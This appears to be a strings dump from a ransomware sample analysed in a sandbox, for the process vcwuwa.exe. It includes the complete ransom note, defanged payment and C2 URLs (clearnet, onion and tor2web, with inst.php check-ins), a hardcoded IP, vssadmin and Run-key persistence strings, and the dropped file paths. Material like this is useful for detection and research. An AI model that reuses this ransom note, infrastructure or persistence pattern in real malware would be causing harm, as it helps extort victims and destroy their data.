wsock32.dll
Ws2_32.dll
HTTP/1.0
/moon011.exe
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.
ntdll.dll
GetProcessHeap
.text
`.rdata
@.data
.reloc
/`.rdBa
KERNEL32.DLL
ADVAPI32.dll
USER32.dll
vcwuwa.exe_1980:
.text
`.rdata
@.data
.rsrc
@.reloc
SSSSh
PSSSSSSh
SSSh`
SSShp
operator
GetProcessWindowStation
.ttl { font-size:13px; color:880000; }
More information about the encryption RSA-2048 can be found here: hXXp://en.wikipedia.org/wiki/RSA_(cryptosystem)
but with our help, you can restore them.
How did this happen?
Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.
All your files were encrypted with the public key, which has been
only possible with the help of the private key and decrypt program,
for the specified time then the conditions for obtaining the private key will be changed.
1.hXXp://lk2gaflsgh.jgy658snfyfnvh.com/%S
2.hXXp://dg62wor94m.sdsfg834mfuuw.com/%S
3.hXXps://djdkduep62kz4nzx.onion.to/%S
1. Download and install tor-browser: hXXp://VVV.torproject.org/projects/torbrowser.html.en
3. Type in the address bar: djdkduep62kz4nzx.onion/%S
4. Follow the instructions on the site.
IMPORTANT INFORMATION:
Your Personal PAGES:
hXXp://lk2gaflsgh.jgy658snfyfnvh.com/%S
hXXp://dg62wor94m.sdsfg834mfuuw.com/%S
hXXps://djdkduep62kz4nzx.onion.to/%S
Your Personal PAGE (using TOR): djdkduep62kz4nzx.onion/%S
Your personal code (if you open the site (or TOR 's) directly): %S
More information about the encryption keys using RSA-2048 can be found here: hXXp://en.wikipedia.org/wiki/RSA_(cryptosystem)
Especially for you, on our server was generated the secret key pair RSA-2048 - public and private.
All your files were encrypted with the public key, which has been transferred to your computer via the Internet.
Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.
Alas, if you do not take the necessary measures for the specified time then the conditions for obtaining the private key will be changed.
1. hXXp://lk2gaflsgh.jgy658snfyfnvh.com/%S
2. hXXp://dg62wor94m.sdsfg834mfuuw.com/%S
3. hXXps://djdkduep62kz4nzx.onion.to/%S
1. Download and install tor-browser: hXXp://VVV.torproject.org/projects/torbrowser.html.en
3. Type in the address bar: djdkduep62kz4nzx.onion/%S
IMPORTANT INFORMATION:
hXXp://lk2gaflsgh.jgy658snfyfnvh.com/%S
hXXp://dg62wor94m.sdsfg834mfuuw.com/%S
hXXps://djdkduep62kz4nzx.onion.to/%S
Your personal page (using TOR): djdkduep62kz4nzx.onion/%S
Your personal identification number (if you open the site (or TOR 's) directly): %S
vssadmin.exe
Qx9uDPyZvEAgViBD e/EWKBpxQ2Z9m==
5LnS0bFGTpT9FURLf0fRPO1WWwR0Ew==
123123123123123
WspMErmucdkoZTpV7cRdxgiPwfQseCgJaSPQjmF9l8wpp/R4vQxuOGtBvZzqNXA8atNVHfoNgK1CI/nVzZChp6Xffpqnp3ICtlgOTvp1myb40qZGbyCbRR/m39IAmt2S4HvWx/wxCtIjxAB5aKPHWd0lmBl7nWXJASCAXO8bhx4nNIoX9aSo9XRV0QQUuhUtS122Ny2A2cw163xF3BvE/99vitwQ/Mi42Q4gQ940DYtb9ZN9aYiM3qT3tlSncywJ8TPSnzGEtnCO7CLX8t102iJxlLlz3JCm2YN TKcbejweZS7WYshCA0OpTee60PojcbiRNvLXAbJyxIrvOlhKIu2SyltQ23xQP6irlrCKRXDdMuixJXHT2TxKOHK/Al6OZi8v31DqZd3Ix2qi dfxtE/7HJj/8LNjhuLVVFu/jUy3 JEz14jgBWHXBYcNDaKLEip THy64RwnMdFqfxUHvKmq7r4Vm/XoTVC2DbVyK/DvkrRoZa9QxlF4CEGfyg/Fjh5XTV0S8skFE0ycLCwXTDg7tmWGYTSpBda63hXKLsMYjQk4nhI9o41Z3SBZGEwvGEm Emhww4FEV53mJJ9OheidfMr6jAR0JLTXAzrd78zwIqBm4BMY2htIcfbJCK9yiBWEYJ27PfKpuKo/hgieh4uIbs2gtIic1ND33oDGmcnL3is7v/zW JV jL7ZHjtNxVS7aICe O5N3LFj/nvbjsEyJqQAs5wiR1AiiIJlbawL4UoKH/1r2uKsBLyqixAgARrePzAXnl046IddKMr9vm1UFb6XQjDhyGxco MVJyDZLvVG8RYsqVjzUknX/TumH/IyBcvTcTsHXEFaBRMBaJUs9wFYDdCOfyhDRpUO1K3xdrSKOFpGWDoz4GERNyscdrCQ84kkeWZzx1i25 1YkmC4SMDNdhM4DyMO6aGUoNjaZ/PuGNdvcloBaI9HBewCu8UYWKc2COXo6cDWHHsSkKPVlgmX2Oth9LMFeMpQbnFr7f2LXQ3anmGs NmjG3TWL k1M5ZqOvQt5QSTY4Td1RaZqIIs0A0zHFmsGwGJVEJo03qMV0u7GfWVAqDmWsMfmqH1ul7rPIqxi cEfOq37oiCYskRQL0XOFo/ceMtQX1Riyt2eK7SSOp79FJXZXDivw8u51dBShLD2G47YGWF9ZYvRmtglABo3Zc1ibTq6Wl0gexl2afz GbFVxC7lMgXf5vWEB0Mj4XZoPkIs4ddaiMW1cr7S6Vc05Vn1DoqPdPenyLI nrbJpXOFEoN2wte7h==
ki1kjLOF6ftBUU19FD4OQIicg6YgwfBdPBhJO1hoPvrmErVpzoBRGINKi5fpWV31x8eW5uRQ4F2hiQEsF2XdF 26jwpl/zT2XrUcyUHWoxmtS9WZcY3mVDROnulMneGgcYPevvW8d15DXGTHsU8CPCmXB2OwRCKUNknuYdxU9wWcwooDXIqsvrcIAOwCjFtt2Or0nCqkeRtXXfM vQPBmoFRmP2L8mwtXDeGONhvCJohPiSmvRIpaw2ytrxrJ K4bUckAfbFC5C2XrtSM0wB0x5g77FIJH/g2uEJ9 JF2BjFDrrNnJP dNxws qWMyuKl1YkChWHcLCnAPCPOPfew7wFACl0VtgPv688lrZhFWr8QbIP8rj3NpUpJXG QIJWpXTXhrjciAJBZwn6Zyi37DwLfkznXL pQWFZkXy99pzR1hd11NXYKAiY9gzqk4ztIF7zNGXXxFe5qBMEfUm3FQd/M5WQpxHh1iqCgKBl0LkQtUxgr152VbWjw7m2FcZv8xZkNZEOSsGSy9t5yXY TXvuWiOwogOt0TVvlYXl9b0WoJz00f29mcdB1g1OmJ MFQmUcejr8UH1MAD6DhB7dzP4QTdpIzUNr1gInS9de4UKv2Jt2NOP5l0Wrg3aC39w7lVVZZ53FLMBFLvJeHC8KO9YeH5Bkh3bWlSvIeBt eNJDOszwmER2DNuLhtDGiAWdSSbPziTiR8h8UPxNoHvmLyKLjx5g7oyL1koQGekPZHZ0b1FehJwwRNrevCB7xZstRVgE3Qs2NRUAZZeGI2 F5yckcA12MrqtKYHS6ParB0lVWyb xOC1DPeGPY2Xig1uAEIVIeKBGHM VCI6mvSc75zEgeOnf8EN3sNEi WHJL6Ah4iJKLEmrrn54 wbkqTTP6aqgcdAs0S32owKAOir9nHoxYJCCuMeBID2FFyxyxcLATcMYOWXLilOXbqjv36s 4iqVPc3Y8z2KJ3Ollff4qtgriRbYUM/lenW1PAxcLSOLKtwzBCSXWceWuawMLxDj7YRwTVg8133qZho6Ofpt/uZm1cDOE08QJJBMI g/OIxi3iO6T2gAE4bWDi47eWoldBX wSFk qXo98aAGgybUpB/QW6bxwQr0Fp/xCrjbf8LLaR6d2ph9oClpAqwtY4KMOG7jh/gvbWPVYCX3r4dKu/nhBPhg9NAI77uZ4VmmhYMuGc4LHjGGX3kQnjsKSdEtcdivbQAsU1sA2mlfKvsIifCgsLUy I46b4x90hYJYR6tz8ElTS0nusYSCfqx56yNdC3C0w0XwGcrEnzNyYq2iNnUkZbqKSMfftS16F2S8FsWP8rKkPx750CVjwXzvlwPwOGu8fonSu3tMd4n1m6p2tgS/Ojy01Ne9ve7g mHCsywJey9MKKFI6LSdrbL3usW334aLm27Wro AK7mjPtuCFRS4nbA2DNxCSr1RCA0S2spAB53tj0pI0Daoq7rLx5tcGpz8wZv4rMEAEyaQqu3oADPIEkAadX9jy2Iu6IE2YfFA/jirwos 2rMnMC hgfHYHjJjDFu9B3fXld4Cc1tVpTn8oZZ7Omg/i9rWDvoj4JVHBQi1OO251IZKY9SxIQurBItmrCq0d2Unl3JEejw2PyZs2Lge7imepLNbbvM2GvWiQpMUORLfOgKolahM4tza3uXo69Jk83LTj9grgb0HcKR2cBdWw02TRIqf3BRa0OdlJ3DNS07jQjyLrDEyv68TNGAojVD0QZLW87bcq7dORrvzM/8Fazil6qSGuOM3xdRtJNEitbr1j3VQ3TpH9QOtSZsz aEP/vh0YCu4scUASEAolGN9u8CCIvvEQxbdz3E Nef7yeiKMWnkXLBXAeylqj68KhCvrLTSChzMSpokNDEDSUcO60KVnNy33EvuJu8B1zxugO0IkAwL9TpptRgdkuxhAeE 
njJQCw1bUrXnVJc5LD5KUff8WhPAK2f32C5vHxeddWPkqF7lV0vM29DLIozceUOA468gjxQiD6ydbTjeqsZRp3vs1Cl3xjs78ySSKLoGuEvF0ed5FSbq2WLBDvytsdfnmDnZ6vAu7zSlto8uqzCYaqKi6jnOmhsztaUiuTu21Ae/JG0qeOrUmO37bf6O/6wDhthgsQD2XmdfPs0fLEVOrAP8RIEKoYS/8Vjs/NJQ9cXkdPvcaVgw5ykzB9eABMEMisewO0u/Z5D9OKehYGHJ0FIMppAXW5Mv0agtTRY5YrBd5Q8rLW fpTxwhAmTfwOIzFII56EWrTbc40 hvKjJpnVpDdnPqIy0naQsRqCl tY wsowHzPNoJM8XbuWSyPjBXRV9udy6drkMMXiPKx8tO vTtNZC1ixezFh77HGr/p 808zptHtBNY4PMtHVSZqy5MndOGYyNgMuxheA0Cz0F38y I4SLFI6Be28pMtDNG15Pj4Q th41nSohB7NmOl/qAZJTIR1YKwSpmQvs/xnkzg8jPIt0BwxIYqkCfdTrvUopBIkzftSrMW91YqUu7EP7hb3JTEpsA2 3nSK2j4d9Ts33C5Sk8P1KrOxbpBf7zt4Uo0gTrxTreo/vqazpJNNa8Px45QCG9n72FCecxcmYERz6OqzQX5 tbga7 sBLWW1lvaxK97T4 Z87zdUpGcxT2jiKVG4F7NmI pNZB5UwYJrnaDTPPtJDdLQgJT9JoMEHLYuljWDpRzNf0v3V99J90vt7VsK/ohkipDWieMHbUzE48 6XSI D2IhAaNJkRJb5zq18IxyrW9hIOwJkfbIqq/7FpbC6pUQypnjwF8CkbK4DcWs65CvfRlc7ry/oJbINCpi7qNh7Nwq4YcQlWDtZTYSJ5aVR0jg4yftMTqjiJ5/Umto/WDO8OO0eWWy7GRZ26jKSrMuKnINpBIiuRw/WrWlXdKiayMKBI7AebWNh0/0IvkbRnww96SmbcyW/qdL VMuMW9/Dm9l2oFiNoSa0jWGUONgtyCdITzjq7aY4KuAqr9QwFmXpjFRRPfPjD3d0T8JkLyMET/0h0XSzYSMrhfcflp1VAJ98a B89n/tdKNZGzfjaiL4WzPERDvO6L6unekgvemq vmV07IzVEHo7nKNU4SG5pJpYU/HHpm3rl5PblmSvVR2iZElreEffOV2vJMR7RtHDRnYaQl NVn8VI2//qI62/sa5Mv4a1IbF03V/AJA11UTKk2TbghJpiFOCYafOIQNKDorhpm4nPF75tvfDzN3dZvjoxCDTZI9oiSFRVkN1ozGe/KptutADFIlDbEKbjtT3Vnuh9eUx1XP/8y9kaCC0wbWD1mVcdbNxlpEqqwgQzIMmZXrdUfv5uRPGBEX2aj6adT9wl5cGi9V7WHCweEhUdSEgIkNjBhVLiEaO0JeZ6PzPB4sJFdGDoMB67b0b1hEGnmumRmMo4f69pXYEcBjp/ergorvIzpyXsG1ez0LtaGSj95S6Dg2NQW1TQRoIvQXsDGGsqOhNn01NAfmiNtbq27QD2Z9cZ/QNZt BZ0wVrWf4 BkdHtpo3JV5qq3F8TOh3bziaO42pZP bI5uQRQQfjrnbnoRP9x75yMqn8XIs4tOC7wA9WCJt5qaHRex7pIxUiQvWVZyU6S1vatTqxwmMwwzkuZ3Qt6ccmmf3SVMsMSIJCYAjU5sd0D1ImchzdPsegz2FKzLv0AOns2BTCfJFIrJc/xKaxGDAU7hwUf0VKhJiRRlttQ8gGo6Z7EANwiWmKTPPkbaU9661sy1Rpc87gOvFhKjpwRakETjQt10rgaeYd3CjZODl97x 
WspMErmucdkoZTpV7cRdxgiPwfQseCgJaSPQjmF9l8wpp/R4vQxuOGtBvZzqNXA8atNVHfoNgK1CI/nVzZChp6Xffpqnp3ICtlgOTvp1myb40qZGbyCbRR/m39IAmt2S4HvWx/wxCtIjxAB5aKPHWd0lmBl7nWXJASCAXO8bhx4nNIoX9aSo9XRV0QQUuhUtS122Ny2A2cw163xF3BvE/99vitwQ/Mi42Q4gQ940DYtb9ZN9aYiM3qT3tlSncywJ8TPSnzGEtnCO7CLX8t102iJxlLlz3JCm2YN TKcbejweZS7WYshCA0OpTee60PojcbiRNvLXAbJyxIrvOlhKIu2SyltQ23xQP6irlrCKRXDdMuixJXHT2TxKOHK/Al6OZi8v31DqZd3Ix2qi dfxtE/7HJj/8LNjhuLVVFu/jUy3 JEz14jgBWHXBYcNDaKLEip THy64RwnMdFqfxUHvKmq7r4Vm/XoTVC2DbVyK/DvkrRoZa9QxlF4CEGfyg/Fjh5XTV0S8skFE0ycLCwXTDg7tmWGYTSpBda63hXKLsMYjQk4nhI9o41Z3SBZGEwvGEm Emhww4FEV53mJJ9OheidfMr6jAR0JLTXAzrd78zwIqBm4BMY2htIcfbJCK9yiBWEYJ27PfKpuKo/hgieh4uIbs2gtIic1ND33oDGmcnL3is7v/zW JV jL7ZHjtNxVS7aICe O5N3LFj/nvbjsEyJqQAs5wiR1AiiIJlbawL4UoKH/1r2uKsBLyqixAgARrePzAXnl046IddKMr9vm1UFb6XQjDhyGxco MVJyDZLvVG8RYsqVjzUknX/TumH/IyBcvTcTsHXEFaBRMBaJUs9wFYDdCOfyhDRpUO1K3xdrSKOFpGWDoz4GERNyscdrCQ84kkeWZzx1i25 1YkmC4SMDNdhM4DyMO6aGUoNjaZ/PuGNdvcloBaI9HBewCu8UYWKc2COXo6cDWHHsSkKPVlgmX2Oth9LMFeMpQbnFr7f2LXQ3anmGs NmjG3TWL k1M5ZqOvQt5QSTY4Td1RaZqIIs0A0zHFmsGwGJVEJo03qMV0u7GfWVAqDmWsMfmqH1ul7rPIqxi cEfOq37oiCYskRQL0XOFo/ceMtQX1Riyt2eK7SSOp79FJXZXDivw8u51dBShLD2G47YGWF9ZYvRmtglABo3Zc1ibTq6Wl0gexl2afz GbFVxC7lMgXf5vWEB0Mj4XZoPkIs4ddaiMW1cr7S6Vc05Vn1DoqPdPenyLI nrbJpXOFEoN2wte7h==
shells5: %s
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
hXXps://djdkduep62kz4nzx.tor2web.org/inst.php
hXXps://djdkduep62kz4nzx.onion.to/inst.php
hXXps://djdkduep62kz4nzx.onion.to
hXXps://djdkduep62kz4nzx.tor2web.org
Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
%s?%s
%s %d %s
MAC Address: %2X-%2X-%2X-%2X-%2X-%2X
kernel32.dll
advapi32.dll
user32.dll
ws2_32.dll
ntdll.dll
winsta.dll
shell32.dll
wininet.dll
urlmon.dll
nspr4.dll
ssl3.dll
winmm.dll
cabinet.dll
opera.dll
Gdi32.dll
gdiplus.dll
crypt32.dll
SHLWAPI.dll
Imagehlp.dll
psapi.dll
olE32.dll
winspool.drv
PSAPI.DLL
GetProcessHeap
KERNEL32.dll
USER32.dll
RegCreateKeyExW
RegFlushKey
RegCloseKey
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteExW
ShellExecuteExA
ShellExecuteW
SHELL32.dll
ole32.dll
MPR.dll
InternetCrackUrlA
InternetOpenUrlW
HttpOpenRequestA
HttpSendRequestA
WININET.dll
GetCPInfo
8$4,8$4
2.0.5b
bn(%d,%d)
194.242.96.218
1. hXXp://lk2gaflsgh.jgy658snfyfnvh.com/4417BF4A15FC3273
2. hXXp://dg62wor94m.sdsfg834mfuuw.com/4417BF4A15FC3273
3. hXXps://djdkduep62kz4nzx.onion.to/4417BF4A15FC3273
3. Type in the address bar: djdkduep62kz4nzx.onion/4417BF4A15FC3273
hXXp://lk2gaflsgh.jgy658snfyfnvh.com/4417BF4A15FC3273
hXXp://dg62wor94m.sdsfg834mfuuw.com/4417BF4A15FC3273
hXXps://djdkduep62kz4nzx.onion.to/4417BF4A15FC3273
Your personal page (using TOR): djdkduep62kz4nzx.onion/4417BF4A15FC3273
1.hXXp://lk2gaflsgh.jgy658snfyfnvh.com/4417BF4A15FC3273
2.hXXp://dg62wor94m.sdsfg834mfuuw.com/4417BF4A15FC3273
3.hXXps://djdkduep62kz4nzx.onion.to/4417BF4A15FC3273
3. Type in the address bar: djdkduep62kz4nzx.onion/4417BF4A15FC3273
Your Personal PAGES:
hXXp://lk2gaflsgh.jgy658snfyfnvh.com/4417BF4A15FC3273
hXXp://dg62wor94m.sdsfg834mfuuw.com/4417BF4A15FC3273
hXXps://djdkduep62kz4nzx.onion.to/4417BF4A15FC3273
Your Personal PAGE (using TOR): djdkduep62kz4nzx.onion/4417BF4A15FC3273
6 7 757}7
mscoree.dll
nKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
%s\system32\cmd.exe
/c start "" "%s"
:Zone.Identifier
3334-55223-6663426
%s\RESTORE_FILES.TXT
%s\RESTORE_FILES.HTML
%s\%s
%s\vcw%s.exe
o%systemroot%\system32\
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
hXXp://ipinfo.io/ip
%s\restore_files_%s.txt
%s\restore_files_%s.html
Software\%s
S-1-5-18\Software\%s
%X%X%X%X%X%X%X%X
CADVAPI32.DLL
KERNEL32.DLL
NETAPI32.DLL
%Documents and Settings%\%current user%\Application Data\vcwuwa.exe
%Documents and Settings%\%current user%\Application Data\vcwuwa.exe:Zone.Identifier
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Desktop
%Documents and Settings%\All Users\Desktop
%WinDir%
%Program Files%
%Documents and Settings%\All Users\Application Data
%Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\CD Burning
%Documents and Settings%\%current user%\My Documents\Recovery_File_koseqijge.txt
1.0.0.1
vcwuwa.exe_1980_rwx_00390000_00004000:
ADVAPI32.DLL
USER32.DLL
EnumWindows
_acmdln
RegCloseKey